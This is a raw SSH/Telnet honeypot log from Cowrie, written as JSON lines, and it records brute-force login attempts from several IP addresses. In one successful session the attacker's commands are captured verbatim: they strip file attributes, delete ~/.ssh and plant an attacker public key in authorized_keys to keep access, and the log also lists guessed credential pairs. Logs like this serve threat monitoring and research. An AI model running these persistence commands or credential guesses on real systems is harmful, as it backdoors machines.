{"eventid":"cowrie.login.failed","username":"blank","password":"blank","message":"login attempt [blank/blank] failed","sensor":"my-vps","timestamp":"2025-09-09T03:54:25.186119Z","src_ip":"152.32.190.168","session":"72aaa1c7cf05"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:26.443196Z","src_ip":"152.32.190.168","session":"72aaa1c7cf05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52254,"dst_ip":"1.2.3.4","dst_port":22,"session":"7265324a3394","protocol":"ssh","message":"New connection: 212.227.235.229:52254 (1.2.3.4:22) [session: 7265324a3394]","sensor":"my-vps","timestamp":"2025-09-09T03:54:40.361991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:40.362928Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:40.748642Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.login.success","username":"root","password":"dddddddd","message":"login attempt [root/dddddddd] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:54:42.327305Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:54:43.159560Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:54:43.160266Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:54:43.161453Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:43.546718Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:54:44.332543Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:54:44.333217Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:54:44.719686Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:44.720753Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54032,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f737d053304","protocol":"ssh","message":"New connection: 212.227.235.229:54032 (1.2.3.4:22) [session: 5f737d053304]","sensor":"my-vps","timestamp":"2025-09-09T03:54:45.090136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:45.090835Z","src_ip":"212.227.235.229","session":"5f737d053304"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:45.469452Z","src_ip":"212.227.235.229","session":"5f737d053304"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:54:47.026394Z","src_ip":"212.227.235.229","session":"5f737d053304"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:48.408345Z","src_ip":"212.227.235.229","session":"5f737d053304"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54596,"dst_ip":"1.2.3.4","dst_port":22,"session":"8155127fb7c0","protocol":"ssh","message":"New connection: 212.227.235.229:54596 (1.2.3.4:22) [session: 8155127fb7c0]","sensor":"my-vps","timestamp":"2025-09-09T03:54:48.787278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:48.788003Z","src_ip":"212.227.235.229","session":"8155127fb7c0"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":34680,"dst_ip":"1.2.3.4","dst_port":22,"session":"85884181b36a","protocol":"ssh","message":"New connection: 211.22.25.164:34680 (1.2.3.4:22) [session: 85884181b36a]","sensor":"my-vps","timestamp":"2025-09-09T03:54:48.826874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:54:48.827790Z","src_ip":"211.22.25.164","session":"85884181b36a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:49.067709Z","src_ip":"211.22.25.164","session":"85884181b36a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:54:49.167979Z","src_ip":"212.227.235.229","session":"8155127fb7c0"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu2023","message":"login attempt [ubuntu/ubuntu2023] failed","sensor":"my-vps","timestamp":"2025-09-09T03:54:50.068605Z","src_ip":"211.22.25.164","session":"85884181b36a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:54:50.730539Z","src_ip":"212.227.235.229","session":"8155127fb7c0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:51.111819Z","src_ip":"212.227.235.229","session":"8155127fb7c0"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:51.118734Z","src_ip":"212.227.235.229","session":"7265324a3394"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:51.311338Z","src_ip":"211.22.25.164","session":"85884181b36a"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":43300,"dst_ip":"1.2.3.4","dst_port":22,"session":"73460e7be8ad","protocol":"ssh","message":"New connection: 92.118.39.62:43300 (1.2.3.4:22) [session: 73460e7be8ad]","sensor":"my-vps","timestamp":"2025-09-09T03:54:54.844378Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:54:54.875089Z","src_ip":"92.118.39.62","session":"73460e7be8ad"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":38478,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e324f799e56","protocol":"ssh","message":"New connection: 51.81.118.153:38478 (1.2.3.4:22) [session: 8e324f799e56]","sensor":"my-vps","timestamp":"2025-09-09T03:55:21.612985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:55:21.614203Z","src_ip":"51.81.118.153","session":"8e324f799e56"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:55:21.709743Z","src_ip":"51.81.118.153","session":"8e324f799e56"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"!","message":"login attempt [sshd/!] failed","sensor":"my-vps","timestamp":"2025-09-09T03:55:22.093518Z","src_ip":"51.81.118.153","session":"8e324f799e56"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:55:23.192300Z","src_ip":"51.81.118.153","session":"8e324f799e56"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":59770,"dst_ip":"1.2.3.4","dst_port":22,"session":"561832434f3e","protocol":"ssh","message":"New connection: 152.32.190.168:59770 (1.2.3.4:22) [session: 561832434f3e]","sensor":"my-vps","timestamp":"2025-09-09T03:55:30.813920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:55:30.814947Z","src_ip":"152.32.190.168","session":"561832434f3e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:55:31.020361Z","src_ip":"152.32.190.168","session":"561832434f3e"}
{"eventid":"cowrie.login.failed","username":"z","password":"password","message":"login attempt [z/password] failed","sensor":"my-vps","timestamp":"2025-09-09T03:55:31.884602Z","src_ip":"152.32.190.168","session":"561832434f3e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:55:33.092877Z","src_ip":"152.32.190.168","session":"561832434f3e"}
{"eventid":"cowrie.session.connect","src_ip":"211.220.131.22","src_port":34560,"dst_ip":"1.2.3.4","dst_port":23,"session":"c44e3a117fbb","protocol":"telnet","message":"New connection: 211.220.131.22:34560 (1.2.3.4:23) [session: c44e3a117fbb]","sensor":"my-vps","timestamp":"2025-09-09T03:55:48.738503Z"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":45422,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdf94269fefa","protocol":"ssh","message":"New connection: 211.22.25.164:45422 (1.2.3.4:22) [session: fdf94269fefa]","sensor":"my-vps","timestamp":"2025-09-09T03:56:00.392501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:56:00.393470Z","src_ip":"211.22.25.164","session":"fdf94269fefa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:56:00.633645Z","src_ip":"211.22.25.164","session":"fdf94269fefa"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T03:56:01.635339Z","src_ip":"211.22.25.164","session":"fdf94269fefa"}
{"eventid":"cowrie.session.closed","duration":13.339978218078613,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:56:02.078421Z","src_ip":"211.220.131.22","session":"c44e3a117fbb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:56:02.877833Z","src_ip":"211.22.25.164","session":"fdf94269fefa"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":44860,"dst_ip":"1.2.3.4","dst_port":22,"session":"c473464d97f0","protocol":"ssh","message":"New connection: 51.81.118.153:44860 (1.2.3.4:22) [session: c473464d97f0]","sensor":"my-vps","timestamp":"2025-09-09T03:56:36.777761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:56:36.778727Z","src_ip":"51.81.118.153","session":"c473464d97f0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:56:36.874825Z","src_ip":"51.81.118.153","session":"c473464d97f0"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T03:56:37.295800Z","src_ip":"51.81.118.153","session":"c473464d97f0"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:56:38.393713Z","src_ip":"51.81.118.153","session":"c473464d97f0"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":36430,"dst_ip":"1.2.3.4","dst_port":22,"session":"d592b94ebfc4","protocol":"ssh","message":"New connection: 152.32.190.168:36430 (1.2.3.4:22) [session: d592b94ebfc4]","sensor":"my-vps","timestamp":"2025-09-09T03:56:38.438801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:56:38.439416Z","src_ip":"152.32.190.168","session":"d592b94ebfc4"}
